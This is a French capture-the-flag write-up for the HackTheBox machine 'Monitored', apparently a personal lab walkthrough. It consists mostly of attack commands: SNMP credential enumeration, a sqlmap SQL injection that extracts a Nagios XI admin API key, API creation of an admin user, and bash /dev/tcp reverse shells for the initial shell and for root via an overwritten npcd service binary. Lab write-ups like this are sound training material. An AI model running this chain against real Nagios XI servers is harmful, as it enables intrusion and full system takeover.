HTB - Monitored | AVALANCHE

Reconnaissance

# /etc/hosts
10.10.11.248 nagios.monitored.htb

nmap -p- --open -sV -v 10.10.11.248

Ports ouverts :

22/tcp — SSH OpenSSH 8.4p1 Debian
80/tcp — HTTP Apache httpd 2.4.56
389/tcp — LDAP OpenLDAP
443/tcp — HTTPS Apache httpd 2.4.56
5667/tcp — tcpwrapped

LDAP & SNMP Enumération

ldapsearch -H ldap://nagios.monitored.htb:389

nmap -p 161 --open -sU -v 10.10.11.248
snmpbulkwalk -c public -v2c 10.10.11.248 .

Credentials SNMP : svc:XjH7VCehowpR1xZB

Enumération Nagios XI

ffuf -u https://nagios.monitored.htb/nagiosxi/FUZZ -w wordlists/dicc.txt -mc 0-299 -fs 0

Endpoints découverts :

api/v1/ — API REST
api/v1/authenticate — Authentification
backend/ — Backend admin
terminal — Shell in a box

Authentification API

curl -XPOST -k -L \
  'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' \
  -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=60'

Exploitation — SQL Injection

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" \
  --cookie="nagiosxi=..." --method POST --dump --technique=ET \
  --dbms=MySQL -p id --risk=3 --level=5 --threads=10

API key admin extraite : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

Création d’un utilisateur admin

curl -POST -k \
  "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" \
  -d "username=nadmin&password=nadmin&name=nadmin&email=newadmin@monitored.htb&auth_level=admin"

Reverse Shell via composant Nagios

nc -nlvp 4444
# Injection de commande via CCM (Core Config Manager)
bash -c 'bash -i >& /dev/tcp/LHOST/4444 0>&1'

Privilege Escalation — npcd service

python3 -c 'import pty;pty.spawn("/bin/bash")'

echo '#!/bin/bash' > /usr/local/nagios/bin/npcd
echo 'bash -i >& /dev/tcp/LHOST/4445 0>&1' >> /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd

sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd

cat /root/root.txt